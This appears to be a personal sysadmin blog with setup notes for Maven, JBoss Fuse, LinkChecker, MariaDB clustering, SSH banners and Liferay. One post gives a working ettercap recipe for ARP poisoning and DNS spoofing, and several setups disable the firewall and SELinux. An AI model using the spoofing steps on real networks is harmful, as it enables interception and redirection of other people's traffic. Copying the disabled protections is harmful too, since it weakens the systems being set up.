Friday, August 19, 2016

maven simple setup

Installation

1. download maven

2. Ensure JAVA_HOME environment variable is set and points to your JDK installation

3. extract maven and put to /opt/
tar xzvf apache-maven-3.3.9-bin.tar.gz

4. make soflink
ln -s apache-maven-3.3.9 maven

5. edit user .bash_profile and add this into it
export M2_HOME=/opt/maven 
export PATH=${M2_HOME}/bin:${PATH}
6. exit and login again to take effect and test maven
mvn --version

7. create a new project and let it generate a new pom.xml
mvn archetype:generate -DgroupId=com.mycompany.app -DartifactId=my-app -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false


reference:
https://maven.apache.org/guides/getting-started/maven-in-five-minutes.html
http://www.tutorialspoint.com/maven/maven_environment_setup.htm

Thursday, August 18, 2016

jboss fuse simple setup

Environment
OS: RedHat Enterprise 7
Java: Oracle jdk1.8.0_91
Fuse: jboss-fuse-6.2.1.redhat-117

Firewall disable
systemctl stop firewalld
systemctl disable firewalld

SELinux disable
vi /etc/selinux/config
change to disabled

Java Setup

1. download Java from oracle website

2. edit /etc/hosts file and add your IP and hostname into it
172.20.1.100   fuse1
if you are setup cluster fuse, then add fuse2 and fuse3 as well to all node hosts file

3. unzip java and put to /opt
then make softlink
ln –s jdk1.8.0_91 jdk1.8.0
this is to easy to upgrade java in future. just extract new update java and change the softlink pointing
then add following line to .bash_profile
export JAVA_HOME=/opt/jdk1.8.0

4. exit and login again to make java take effect and test by using this command
java -version



Fuse Setup

NODE 1
1. unzip jboss fuse to /opt and make a softlink as well
ln –s jboss-fuse-full-6.2.1-redhat-117 fuse

2. edit <fuse-install-dir>/etc/system.properties to rename karaf instance as fuse1 (from root):
# Name of this Karaf instance
karaf.name=fuse1

3. start fuse
cd /opt/fuse
bin/fuse

4. From the Fuse CLI, create an ESB admin user using the following command, substitute <user name> and <user password> with actual values:
esb:create-admin-user --new-user <user name> --new-user-password <user password>

5. Shutdown Fuse and restart as a background service using:
bin/start

6. Connect to Fuse using admin user created above:
bin/client –u <user name> -p <user password>
7. Next create Fabric:
fabric:create --zookeeper-password <zookeeper-password> --zookeeper-data-dir zkdata
--resolver localhostname --wait-for-provisioning

8. As a practice, we do not deploy application services to root containers, so we can remove the jboss-fuse-full profile from the container:
container-remove-profile fuse1 jboss-fuse-full



NODE 2 & NODE 3
1. After unzip, JBoss Fuse will be installed in /opt/jboss-fuse-full-6.2.1-redhat-117. For convenience, create a symbolic link:
cd /opt/dportal
ln –s jboss-fuse-full-6.2.1-redhat-117 fuse

2. edit <fuse-install-dir>/etc/system.properties to rename karaf instance as fuse2 and fuse3 (from root), respectively:
Node 2 (172.20.1.101):
# Name of this Karaf instance
karaf.name=fuse2

Node 3 (171.20.1.102):
# Name of this Karaf instance
karaf.name=fuse3

3. Start Fuse:
$ cd /home/fmsapps/fuse
$ bin/fuse

4. Join fabric
fabric:join --zookeeper-password <zookeeper-password> --resolver localhostname
fuse1:2181

5. Shutdown Fuse and restart as a background service using:
$ bin/start
6. Connect to Fuse using admin user created above:
$ bin/client –u <user name> -p <user password>
At this point, 3 JBoss Fuse Fabric containers were created and started.
On 172.20.1.100 (fuse1), log in to Fuse Fabric CLI and issue the following command to create an
ensemble.
JBossFuse:fuseadmin@utdrvfuse1> ensemble-add utdrvfuse2 utdrvfuse3

Once the command is completed, the fabric container list should be similar to:
JBossFuse:fabric@fuse1> container-list
   [id] [version][connected] [profiles] [provision status]
   utdrvfuse1* 1.0 yes fabric, fabric-ensemble-0001-1 success
   utdrvfuse2 1.0 yes fabric, fabric-ensemble-0001-2 success
   utdrvfuse3 1.0 yes fabric, fabric-ensemble-0001-3 success

The Fuse setup is complete. Fuse management console can be accessed from http://172.20.1.100:8181



Monday, August 15, 2016

LinkChecker

Install Linckecker

# wget --no-check-certificate https://pypi.python.org/packages/source/L/LinkChecker/LinkChecker-9.3.tar.gz


Got 2 way to install

  • Manual installation where you download the source and initiate install yourself
  • Auto install Linckecker by using pip


Manual Installation
For Centos/RHEL 6 -> enable Software Collection to install Python 2.7
For Centos/RHEL 7 -> just use yum install python

Enable Software collection
RHEL -> # subscription-manager repos --enable rhel-server-rhscl-6-rpms
Centos -> # yum install centos-release-scl

Then install python27
# yum install python27
You need to enable it in order to use
# scl enable python27 bash

Install the remain package needed to run
# yum install gcc python-requests qt-devel

On How to install, you can read the doc at LinkChecker-9.3/doc/install.txt

# make -C doc/html
# python setup.py sdist --manifest-only
# python setup.py build

# python setup.py install

You can test run by using this command
# linkchecker www.google.com -Fcsv//tmp/google.csv


Troubleshooting
If you encounter this error “This program requires Python requests 2.2.0 or later” when you test run.
Downgrade the request version as Linkcheck 9.3 having bug with request ver 10
Downgrade using pip

# yum install python27-python-pip
# pip install requests==2.9.2



Auto Installation

# yum install gcc qt-devel

Enable software collection if you using Centos/RHEL 6 and install python27 & python27-python-pip
# yum install python27-python-pip python27

Then install Linkchecker using pip
# scl enable python27 bash
# pip install LinkChecker

Tuesday, July 12, 2016

spoof DNS using kali linux

1. locate a file by the name etter.dns
#locate etter.dns

2. open the file using nano/vi/vim

3. edit after the line "*wildcards in PTR are not allowed"
example, you can add this below that line
www.msn.com A 192.168.1.8

4. go to /proc/sys/net/ipv4 and edit ip_forward to 1

5. start the ettercap
ettercap -T -q -M arp:remote -P dns_spoof

(enter q to abort)

reference
https://www.cybrary.it/0p3n/infosec-101-dns-spoof/

Monday, April 18, 2016

mariadb cluster

Environment i using
OS: RHEL7
database: MariaDB 10.1.13
firewalld: off
SElinux: off

===== Install MariaDB =====

default in your OS, it had mariadb include in yum repo but it was using old version.
Please add this repo to enable the latest version officially from MariaDB

# vim /etc/yum.repo.d/mariadb.repo

---------- mariadb.repo ----------

[mariadb]
name = MariaDB
baseurl = http://yum.mariadb.org/10.1/rhel7-amd64
gpgkey=https://yum.mariadb.org/RPM-GPG-KEY-MariaDB
gpgcheck=1

---------- END ----------

for the baseurl, if you are using centos or other, you can check it at here for the path


install mariadb using this command

# yum install mariadb-server



===== Setup MaridDB for Cluster =====

open and edit my.cnf
add the section in red color

# vim /etc/my.cnf

---------- my.cnf ----------
#
# This group is read both both by the client and the server
# use it for options that affect everything
#
[client-server]

#
# include all files from the config directory
#
!includedir /etc/my.cnf.d

[galera]

wsrep_on=ON
wsrep_provider=/usr/lib64/galera/libgalera_smm.so
binlog_format=ROW
wsrep_cluster_address='gcomm://'
wsrep_cluster_name='galera_cluster'
wsrep_node_name='node1'

---------- END ----------

for the 2nd database, just repeat the installation step but at my.cnf you need to edit the
wsrep_cluster_address='gcomm://<node 1 IP address>'
wsrep_node_name='node2'


Start both databases
# systemctl start mariadb

login to mysql and you can check if it was success

MariaDB [(none)]> SHOW STATUS LIKE 'wsrep_cluster_size';
+--------------------+-------+
| Variable_name      | Value |
+--------------------+-------+
| wsrep_cluster_size | 2     |
+--------------------+-------+
1 row in set (0.01 sec)

this shown above indicate got 2 node mean it was success.

you can check for other info using this command

MariaDB [(none)]> show global status like 'wsrep_%';

Monday, April 11, 2016

SSH Login Banner

there are 2 type of banner
1 is show before you login
and another is show after you success login

-------------------------------------------------------------------
Show before login

by default, there already prepare a banner for us but is not used.
it located at /etc/issue.net
it show the kernel version as banner at login
you can use this or use your own script
just create a file example
# vim  /etc/ssh/banner
and put something like this

#####################
#                                      #
#  Welcome to Centos 7 #
#                                     #
####################

then enable the banner
# vim /etc/ssh/sshd_config
find and edit this

# no default banner path
#Banner none

to

# no default banner path
Banner /etc/ssh/banner

then restart the sshd service
-----------------------------------------------------------------

Show after success login

# vim /etc/motd

and edit to your like

setup Liferay 7 tomcat bundle + cluster

OS = CentOS Linux release 7.2.1511 (Core)
Liferay version = liferay-portal-tomcat-7.0-ce-ga1-20160331161017956
Java = java version "1.7.0_79"

===== Liferay =====

1. download java and install it
    for mine i download oracle java sdk 7 at
    http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html
    download the rpm for easy install and upgrade
    # yum localinstall jdk-7u79-linux-x64.rpm

2. download liferay and extract it.
    for mine, i extract and put it at /opt
    then i rename it to liferay so it will become /opt/liferay

3. go to /opt/liferay/tomcat-8.0.32/bin
    test run 1 times to confirm it was working with default settings
    # ./startup.sh
    use browser and try access it at
    <server ip>:8080
    and stop it after confirm working
    # shutdown.sh

4. install tomcat native for better performance
    at bin directory, extract tomcat-native.tar.gz and navigate to native directory inside it
    # ./configure --with-apr=/usr/bin/apr-1-config --with-java-home=/usr/java/default --with-ssl=/usr/bin/openssl --prefix=/usr
    # make
    # make install

5. back to bin directory and extract commons-daemon-native.tar.gz
    navigate into unix folder
    # ./configure --with-java=/usr/java/default
    # make
    # cp jsvc ../..

6. add tomcat user for liferay to run instead of using root
    # useradd tomcat
    # chown -R tomcat: /opt/liferay

7. at tomcat bin directory, edit setenv.sh and change the Xmx value to suit your server memory.
    for mine, i also had manual set Xms value as well

====== startup script =====

since it is using systemd for centos7, below is the guide on how to add
# cd /etc/systemd/system
# vim tomcat.service

=== tomcat.service ===

# Systemd unit file for tomcat
[Unit]
Description=Apache Tomcat Web Application Container
After=syslog.target network.target

[Service]
Type=forking
#ExecStart=/etc/init.d/tomcat start
ExecStart=/opt/liferay/tomcat/bin/startup.sh
ExecStop=/opt/liferay/tomcat/bin/shutdown.sh
User=tomcat
Group=tomcat

TimeoutStartSec=0
TimeoutStopSec=600

[Install]
WantedBy=multi-user.target

=== END ===

enable it to run at startup
# systemctl enable tomcat.service

now you can test use systemctl to start and stop to confirm it working
# systemctl start tomcat
# systemctl stop tomcat

monitor the log at /opt/liferay/tomcat/logs/catalina.out
to make sure it fully startup without error


===== Apache =====

you either can use your firewall to redirrect port 8080 to port 80
or
use mod_jk for port 80 to 8080




===== cluster =====

1. edit <liferay>/tomcat/conf/context.xml
     change <Context>
     to <Context distributable="true">

2. edit server.xml
    change <Engine name="Catalina" defaultHost="localhost">
    to <Engine name="Catalina" defaultHost="localhost" jvmRoute="node1">
    then below it add this as well

=== server.xml ===

<Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"
        channelSendOptions="6">

  <Manager className="org.apache.catalina.ha.session.BackupManager"
        expireSessionsOnShutdown="false"
        notifyListenersOnReplication="true"
        mapSendOptions="6"/>


  <Channel className="org.apache.catalina.tribes.group.GroupChannel">
    <Membership className="org.apache.catalina.tribes.membership.McastService"
        address="228.0.0.4"
        port="45564"
        frequency="500"
        dropTime="3000"/>
    <Receiver className="org.apache.catalina.tribes.transport.nio.NioReceiver"
      address="auto"
        port="5000"
        selectorTimeout="100"
        maxThreads="6"/>

    <Sender className="org.apache.catalina.tribes.transport.ReplicationTransmitter">
      <Transport className="org.apache.catalina.tribes.transport.nio.PooledParallelSender"/>
    </Sender>
    <Interceptor className="org.apache.catalina.tribes.group.interceptors.TcpFailureDetector"/>
    <Interceptor className="org.apache.catalina.tribes.group.interceptors.MessageDispatch15Interceptor"/>
    <Interceptor className="org.apache.catalina.tribes.group.interceptors.ThroughputInterceptor"/>
  </Channel>

  <Valve className="org.apache.catalina.ha.tcp.ReplicationValve"
         filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/>

  <ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/>
</Cluster>
=== end ===

3. edit <liferay>/tomcat/conf/Catalina/localhost/ROOT.xml and add this into it

=== ROOT.xml ===

<Resource
        name="jdbc/LiferayPool"
        auth="Container"
        type="javax.sql.DataSource"
        driverClassName="com.mysql.jdbc.Driver"
        url="jdbc:mysql://<DB IP>/<DB name>?useUnicode=true&amp;characterEncoding=UTF-8"
        username="DB username"
        password="DB password"
        maxActive="100"
        maxIdle="30"
        maxWait="60000"
    />

=== end ===

4. then at <liferay>/tomcat/webapps/ROOT/WEB-INF/classes, create portal-ext.properties file and put this into it

=== portal-ext.properties ===

jdbc.default.jndi.name=jdbc/LiferayPool

=== end ===

Wednesday, March 2, 2016

deploy liferay EE into Jboss 6 EAP manually

i am using Jboss EAP 6.4
with java 1.7.0_79
and for liferay, i am deploying Liferay Portal 6.2 EE SP14
with Liferay Portal 6.2 EE SP14 Dependencies
the dependencies is needed in order for liferay to run if you build yourself

unzip the jboss eap and install the java
create a folder call liferay and put extracted jboss into it

for mine, i put the liferay at /opt , it will look like this
/opt/liferay/jboss

1. deploy dependencies


cd to jboss folder and make new dir like this
<jboss>/modules/com/liferay/portal/main

unzip liferay-portal-dependencies-6.2-ee-sp14 and put all into <jboss>/modules/com/liferay/portal/main
put the mysql connector there as well if you using mysql

at the same directory, create a file name module.xml
and put this into it

<?xml version="1.0"?>

<module xmlns="urn:jboss:module:1.0" name="com.liferay.portal">
        <resources>
                <resource-root path="hsql.jar" />

                <resource-root path="portal-service.jar" />
                <resource-root path="portlet.jar" />
                <resource-root path="mysql-connector-java-5.1.38-bin.jar" />
        </resources>
        <dependencies>
                <module name="ibm.jdk" />
                <module name="javax.api" />
                <module name="javax.mail.api" />
                <module name="javax.servlet.api" />
                <module name="javax.servlet.jsp.api" />
                <module name="javax.transaction.api" />
        </dependencies>
</module>

please edit the mysql name to match yours

2. Jboss configuration

part 1

go to liferay/jboss/standalone/configuration/
and edit standalone.xml
between the  </extensions> and <management> (note: should be around line 27 - 30 )
add this into it

<system-properties>
        <property name="org.apache.catalina.connector.URI_ENCODING" value="UTF-8"/>
        <property name="org.apache.catalina.connector.USE_BODY_ENCODING_FOR_QUERY_STRING" value="true"/>
</system-properties>

part 2

then search deployment-scanner
and add deployment-timeout="240"

it will look something like this
<deployment-scanner path="deployments" relative-to="jboss.server.base.dir" scan-interval="5000" deployment-timeout="240"/>

part 3

then search for <subsystem xmlns="urn:jboss:domain:security:1.2">
and add this into it

<security-domain name="PortalRealm">
    <authentication>
       <login-module code="com.liferay.portal.security.jaas.PortalLoginModule" flag="required" />
    </authentication>
</security-domain>

it will look something like this

        <subsystem xmlns="urn:jboss:domain:security:1.2">
            <security-domains>
                <security-domain name="other" cache-type="default">
                    <authentication>
                        <login-module code="Remoting" flag="optional">
                            <module-option name="password-stacking" value="useFirstPass"/>
                        </login-module>
                        <login-module code="RealmDirect" flag="required">
                            <module-option name="password-stacking" value="useFirstPass"/>
                        </login-module>
                    </authentication>
                </security-domain>
                <security-domain name="jboss-web-policy" cache-type="default">
                    <authorization>
                        <policy-module code="Delegating" flag="required"/>
                    </authorization>
                </security-domain>
                <security-domain name="jboss-ejb-policy" cache-type="default">
                    <authorization>
                        <policy-module code="Delegating" flag="required"/>
                    </authorization>
                </security-domain>
                <security-domain name="PortalRealm">
                    <authentication>
                        <login-module code="com.liferay.portal.security.jaas.PortalLoginModule" flag="required" />
                   </authentication>
                </security-domain>
            </security-domains>
        </subsystem>

part 4

search enable-welcome-root and change it to false

<virtual-server name="default-host" enable-welcome-root="false">

3. deploy Liferay war

create ROOT.war folder in liferay/jboss/standalone/deployments
extract the Liferay .war file into the ROOT.war folder

# jar -xvf liferay.war

at the same level with ROOT.war, create empty file call ROOT.war.dodeploy
# touch ROOT.war.dodeploy

In the ROOT.war file, open the WEB-INF/jboss-deployment-structure.xml file. In this file, replace the <module name="com.liferay.portal" /> dependency with the following configuration:

<module meta-inf="export" name="com.liferay.portal">
    <imports>
        <include path="META-INF" />
    </imports>
</module>

This allows OSGi plugins like Audience Targeting to work properly, by exposing the Portal API through the OSGi container.

reference:
1. https://www.liferay.com/group/customer/knowledge/kb/-/knowledge_base/article/23340173 (must login liferay first)